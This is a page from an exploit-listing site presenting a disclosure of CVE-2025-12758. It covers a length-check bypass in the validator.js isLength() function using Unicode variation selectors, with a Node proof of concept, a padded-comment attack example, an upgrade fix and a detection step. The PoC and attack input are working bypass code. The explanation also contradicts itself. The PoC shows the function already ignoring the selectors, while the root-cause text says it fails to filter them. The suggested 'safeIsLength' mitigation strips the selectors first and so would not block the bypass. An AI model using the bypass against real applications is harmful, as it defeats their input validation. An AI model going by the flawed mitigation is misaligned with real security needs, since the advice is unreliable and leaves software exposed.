## https://sploitus.com/exploit?id=4DE1560C-8734-5BAE-8FEF-3EBBAC0A50A8
# CVE-2025-12758: Validator.js isLength() Unicode Variation Selector Bypass
**CVE ID:** CVE-2025-12758
**CVSS Score:** 8.7 (HIGH)
**Severity:** HIGH
**CWE:** CWE-792 (Incomplete Filtering of One or More Instances of Special Elements)
**Published:** November 26, 2025
**Disclosed:** October 19, 2025
## Vulnerability Overview
This vulnerability affects the `validator` npm package versions **< 13.15.22**. The `isLength()` function fails to account for Unicode variation selectors (`\uFE0F`, `\uFE0E`) when calculating string length, leading to improper input validation.
### Impact
An application using `isLength()` for input validation can accept strings significantly longer than intended, potentially resulting in:
- **Data truncation** in databases
- **Buffer overflows** in other system components
- **Denial-of-service (DoS)** attacks
- **Input validation bypass**
### Root Cause
The `isLength()` function does not properly filter out Unicode variation selectors when calculating string length. These special characters (combining marks) should not contribute to the visual length of a string but are counted in JavaScript's `String.length` property.
## Proof of Concept
### Setup
```bash
npm install validator@13.15.20
node poc.js
```
### Code
The POC demonstrates the vulnerability by testing the `isLength()` function:
```javascript
const validator = require('validator');
// Normal "test" string - correctly rejected
console.log(`Is "test" (String.length: ${'test'.length}) length ≤ 3? ${validator.isLength('test', { max: 3 })}`);
// Output: Is "test" (String.length: 4) length ≤ 3? false
// Normal "test" string - correctly accepted
console.log(`Is "test" (String.length: ${'test'.length}) length ≤ 4? ${validator.isLength('test', { max: 4 })}`);
// Output: Is "test" (String.length: 4) length ≤ 4? true
// "test" with 4 variation selectors - INCORRECTLY accepted
console.log(`Is "test️️️️" (String.length: ${'test\uFE0F\uFE0F\uFE0F\uFE0F'.length}) length ≤ 4? ${validator.isLength('test\uFE0F\uFE0F\uFE0F\uFE0F', { max: 4 })}`);
// Output: Is "test️️️️" (String.length: 8) length ≤ 4? true ⚠️ VULNERABLE!
```
### Output
```
Is "test" (String.length: 4) length less than or equal to 3? false
Is "test" (String.length: 4) length less than or equal to 4? true
Is "test️️️️" (String.length: 8) length less than or equal to 4? true
```
The third output demonstrates the vulnerability: a string with actual length 8 passes a validation check for maximum length 4.
## Exploitation Scenario
An application might implement user comment validation:
```javascript
const MAX_COMMENT_LENGTH = 100;
function validateComment(comment) {
return validator.isLength(comment, { max: MAX_COMMENT_LENGTH });
}
const maliciousInput = 'a'.repeat(50) + '\uFE0F'.repeat(100);
// Actual length: 150 characters
// validator.isLength() incorrectly returns: true ❌
// Database accepts malicious payload ⚠️
```
## Fix
### Upgrade to Version 13.15.22 or Later
```bash
npm install validator@13.15.22
```
The patched version properly handles Unicode variation selectors by excluding them from length calculations.
### Alternative Mitigation (Temporary)
If you cannot immediately upgrade, implement custom length validation:
```javascript
function safeIsLength(str, options = {}) {
// Remove Unicode variation selectors before validation
const cleanStr = str.replace(/[\uFE0E\uFE0F]/g, '');
return validator.isLength(cleanStr, options);
}
```
## References
- **Snyk Vulnerability Database:** https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476
- **GitHub Gist (Original Proof):** https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e
- **GitHub PR (Fix):** https://github.com/validatorjs/validator.js/pull/2616
- **CVE Record:** https://vulners.com/cve/CVE-2025-12758
## Detection
Check if your application is vulnerable:
```bash
npm audit --audit-level=high
```
Look for `validator` package with version < 13.15.22.
## Credit
Vulnerability discovered by: Karol Wrótniak
## License
ISC